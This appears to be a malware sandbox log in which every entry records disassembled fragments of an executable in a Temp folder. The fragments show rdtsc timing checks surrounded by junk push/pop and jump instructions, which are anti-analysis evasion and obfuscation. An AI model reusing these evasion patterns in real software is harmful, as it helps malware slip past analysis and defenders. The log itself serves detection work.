Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10AF267 second address: 10AF26D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10AF26D second address: 10AF271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10AF3EB second address: 10AF3F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10AF3F1 second address: 10AF3F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10AF6D8 second address: 10AF70E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 jng 00007F3FE11BFDC6h 0x0000000d jc 00007F3FE11BFDC6h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pop edx 0x00000017 pop eax 0x00000018 js 00007F3FE11BFDD4h 0x0000001e jmp 00007F3FE11BFDCEh 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 jnp 00007F3FE11BFDC6h 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10AF70E second address: 10AF712 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 103A0D1 second address: 103A0FE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3FE11BFDC6h 0x00000008 jc 00007F3FE11BFDC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 jnl 00007F3FE11BFDC6h 0x00000017 jmp 00007F3FE11BFDD2h 0x0000001c pop edx 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10B0157 second address: 10B015D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10B299A second address: 10B29A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10B5E23 second address: 10B5E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FE0C24E5Bh 0x00000009 popad 0x0000000a pop edi 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F3FE0C24E63h 0x00000014 popad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10B5E4F second address: 10B5E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10BA4A4 second address: 10BA4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1084873 second address: 1084877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1084E1D second address: EDEC9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F3FE0C24E63h 0x00000012 push dword ptr [ebp+122D1051h] 0x00000018 pushad 0x00000019 adc cx, 393Ch 0x0000001e mov eax, dword ptr [ebp+122D3A0Bh] 0x00000024 popad 0x00000025 call dword ptr [ebp+122D262Eh] 0x0000002b pushad 0x0000002c jno 00007F3FE0C24E6Ch 0x00000032 xor eax, eax 0x00000034 or dword ptr [ebp+122D2451h], ecx 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e pushad 0x0000003f or dword ptr [ebp+122D2451h], eax 0x00000045 jmp 00007F3FE0C24E64h 0x0000004a popad 0x0000004b mov dword ptr [ebp+122D3B87h], eax 0x00000051 js 00007F3FE0C24E66h 0x00000057 jmp 00007F3FE0C24E60h 0x0000005c mov esi, 0000003Ch 0x00000061 jmp 00007F3FE0C24E5Ah 0x00000066 add esi, dword ptr [esp+24h] 0x0000006a mov dword ptr [ebp+122D24A9h], ecx 0x00000070 sub dword ptr [ebp+122D2451h], ecx 0x00000076 lodsw 0x00000078 jmp 00007F3FE0C24E5Ah 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 stc 0x00000082 mov ebx, dword ptr [esp+24h] 0x00000086 clc 0x00000087 nop 0x00000088 push eax 0x00000089 push edx 0x0000008a jmp 00007F3FE0C24E62h 0x0000008f rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1084EBA second address: 1084ED1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3FE11BFDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1084ED1 second address: 1084F2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jno 00007F3FE0C24E5Ah 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 je 00007F3FE0C24E58h 0x0000001d pushad 0x0000001e popad 0x0000001f push edx 0x00000020 jmp 00007F3FE0C24E67h 0x00000025 pop edx 0x00000026 popad 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1084F2C second address: 1084F30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1084F30 second address: 1084F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1084F36 second address: 1084F58 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push esi 0x0000000a adc cx, FE87h 0x0000000f pop edi 0x00000010 push F927AA05h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F3FE11BFDCBh 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10850E0 second address: 10850E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10850E4 second address: 108511B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], esi 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F3FE11BFDC8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov ecx, eax 0x00000026 nop 0x00000027 jp 00007F3FE11BFDD8h 0x0000002d push eax 0x0000002e push edx 0x0000002f jne 00007F3FE11BFDC6h 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 108511B second address: 108512A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3FE0C24E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1085B7E second address: 106648E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3FE11BFDC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dl, 17h 0x0000000f call dword ptr [ebp+122D37FBh] 0x00000015 push ebx 0x00000016 pushad 0x00000017 js 00007F3FE11BFDC6h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 pushad 0x00000021 jmp 00007F3FE11BFDCDh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10B9764 second address: 10B9769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10B98F0 second address: 10B9904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FE11BFDD0h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10B9904 second address: 10B9908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10B9908 second address: 10B9914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3FE11BFDC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10B9914 second address: 10B9925 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F3FE0C24E78h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10B9925 second address: 10B9931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3FE11BFDC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10B9931 second address: 10B993A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10B993A second address: 10B993E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10B9A62 second address: 10B9A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jl 00007F3FE0C24E56h 0x0000000c jnl 00007F3FE0C24E56h 0x00000012 jmp 00007F3FE0C24E69h 0x00000017 jg 00007F3FE0C24E56h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 pop eax 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10B9BDE second address: 10B9BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10B9BE4 second address: 10B9BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3FE0C24E5Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10B9BFC second address: 10B9C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F3FE11BFDC6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10B9C06 second address: 10B9C0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10B9C0A second address: 10B9C10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10B9C10 second address: 10B9C16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10B9C16 second address: 10B9C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10B9F0B second address: 10B9F1B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3FE0C24E56h 0x00000008 jbe 00007F3FE0C24E56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10C3C08 second address: 10C3C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10C3C0E second address: 10C3C37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E63h 0x00000007 jmp 00007F3FE0C24E5Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10C29A9 second address: 10C29AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10C2C5F second address: 10C2C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10C2C63 second address: 10C2C67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10C2C67 second address: 10C2C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10C2F47 second address: 10C2F53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F3FE11BFDC6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10C2F53 second address: 10C2F59 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10C2629 second address: 10C264E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3FE11BFDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F3FE11BFDDBh 0x00000010 jmp 00007F3FE11BFDD3h 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10C264E second address: 10C2654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10C2654 second address: 10C2658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10C2658 second address: 10C267E instructions: 0x00000000 rdtsc 0x00000002 je 00007F3FE0C24E56h 0x00000008 jmp 00007F3FE0C24E64h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10C267E second address: 10C2684 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10C34D4 second address: 10C34EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FE0C24E67h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10C362E second address: 10C3638 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10C3638 second address: 10C363C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10C363C second address: 10C3645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10C3645 second address: 10C365A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3FE0C24E56h 0x0000000a pop ecx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10C365A second address: 10C365E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10C365E second address: 10C3674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3FE0C24E5Ah 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10C6C1E second address: 10C6C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e ja 00007F3FE11BFDC6h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 jmp 00007F3FE11BFDD6h 0x0000001c push eax 0x0000001d push edx 0x0000001e push edx 0x0000001f pop edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10C6C4F second address: 10C6C53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10C6C53 second address: 10C6C6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3FE11BFDC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edx 0x0000000e push ebx 0x0000000f ja 00007F3FE11BFDC6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10C67C2 second address: 10C67E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FE0C24E68h 0x00000009 js 00007F3FE0C24E56h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10C91D7 second address: 10C91ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 jbe 00007F3FE11BFDF9h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10D081D second address: 10D0821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10D0821 second address: 10D0827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10CEDBF second address: 10CEDC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10CEDC8 second address: 10CEDF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3FE11BFDC6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F3FE11BFDD2h 0x00000013 jnp 00007F3FE11BFDCCh 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10CEDF3 second address: 10CEDFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10CEF99 second address: 10CEF9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10CEF9D second address: 10CEFA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10CEFA3 second address: 10CEFB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jbe 00007F3FE11BFDC6h 0x0000000f jno 00007F3FE11BFDC6h 0x00000015 popad 0x00000016 rdtsc
